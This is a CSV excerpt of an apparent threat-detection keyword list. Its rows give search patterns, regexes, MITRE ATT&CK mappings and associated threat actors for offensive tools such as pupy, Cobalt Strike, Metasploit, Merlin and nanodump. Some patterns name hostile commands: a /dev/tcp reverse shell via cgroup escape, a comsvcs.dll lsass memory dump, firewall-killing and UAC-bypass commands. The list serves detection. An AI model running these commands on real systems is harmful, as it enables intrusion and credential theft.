"*run mount-cgroup ""sh -i * /dev/tcp/*",".{0,1000}run\smount\-cgroup\s\""sh\s\-i\s.{0,1000}\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","57662"
"*run mouselogger*",".{0,1000}run\smouselogger.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57663"
"*run post/windows/gather/checkvm*",".{0,1000}run\spost\/windows\/gather\/checkvm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57664"
"*run post/windows/manage/killfw*",".{0,1000}run\spost\/windows\/manage\/killfw.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57665"
"*run post/windows/manage/migrate*",".{0,1000}run\spost\/windows\/manage\/migrate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57666"
"*run pyexec *",".{0,1000}run\spyexec\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57667"
"*run --rm -it xshuden/cheetah*",".{0,1000}run\s\-\-rm\s\-it\sxshuden\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","57668"
"*run shell_exec *",".{0,1000}run\sshell_exec\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57669"
"*run shellcode_exec*",".{0,1000}run\sshellcode_exec.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57670"
"*Run the krbscm method for SYSTEM shell*",".{0,1000}Run\sthe\skrbscm\smethod\sfor\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57671"
"*run thief:latest*",".{0,1000}run\sthief\:latest.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","57672"
"*Run WCE indefinitely, waiting for new credentials/logon sessions*",".{0,1000}Run\sWCE\sindefinitely,\swaiting\sfor\snew\scredentials\/logon\ssessions.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","57673"
"*run_kmod.sh netkit.ko netkit*",".{0,1000}run_kmod\.sh\snetkit\.ko\snetkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","57674"
"*run_ppl_dump_exploit*",".{0,1000}run_ppl_dump_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57675"
"*run_ppl_medic_exploit*",".{0,1000}run_ppl_medic_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57676"
"*run_python.sh client/shell.py*",".{0,1000}run_python\.sh\sclient\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","57677"
"*run_server.bat",".{0,1000}run_server\.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","57678"
"*runasadmin uac-cmstplua*",".{0,1000}runasadmin\suac\-cmstplua.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57679"
"*runasadmin uac-token-duplication*",".{0,1000}runasadmin\suac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57680"
"*RunasCreateProcessAsUserW*",".{0,1000}RunasCreateProcessAsUserW.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57681"
"*RunasCs v1.5 - @splinter_code*",".{0,1000}RunasCs\sv1\.5\s\-\s\@splinter_code.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57682"
"*RunasCs v1.5 - @splinter_code*",".{0,1000}RunasCs\sv1\.5\s\-\s\@splinter_code.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57683"
"*RunasCs* --remote-impersonation*",".{0,1000}RunasCs.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57685"
"*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57686"
"*RunasCs.zip*",".{0,1000}RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57687"
"*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57688"
"*runas-netonly *",".{0,1000}runas\-netonly\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57689"
"*runasppl_check*",".{0,1000}runasppl_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57690"
"*RunAsWinTcb.exe*",".{0,1000}RunAsWinTcb\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","57691"
"*RunAsWinTcb-master*",".{0,1000}RunAsWinTcb\-master.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","57692"
"*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCleanup\-77740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57693"
"*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCodeExec\-75740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57694"
"*run-dll SharpSploit*",".{0,1000}run\-dll\sSharpSploit.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57695"
"*rundll32 *RunRubeus*",".{0,1000}rundll32\s.{0,1000}RunRubeus.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","57696"
"*rundll32 charlotte.dll*",".{0,1000}rundll32\scharlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","57697"
"*rundll32 merlin.dll,Magic*",".{0,1000}rundll32\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57698"
"*rundll32 merlin.dll,Merlin*",".{0,1000}rundll32\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57699"
"*rundll32 merlin.dll,Run*",".{0,1000}rundll32\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57700"
"*rundll32.exe agressor.dll*dec*",".{0,1000}rundll32\.exe\sagressor\.dll.{0,1000}dec.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","57705"
"*rundll32.exe C:\Users\Public\*",".{0,1000}rundll32\.exe\sC\:\\Users\\Public\\.{0,1000}","offensive_tool_keyword","powershell","Defense evasion technique","T1218.011","TA0005","N/A","N/A","Defense Evasion","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57706"
"*rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id*",".{0,1000}rundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll\sMiniDump\s\(Get\-Process\slsass\)\.id.{0,1000}","offensive_tool_keyword","powershell","credential dumping activity","T1003.001","TA0006","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/22/g/analyzing-penetration-testing-tools-that-threat-actors-use-to-br.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57707"
"*rundll32.exe* merlin.dll,Magic*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57708"
"*rundll32.exe* merlin.dll,Merlin*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57709"
"*rundll32.exe* merlin.dll,Run*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57710"
"*RunDLL32JSStager*",".{0,1000}RunDLL32JSStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","57711"
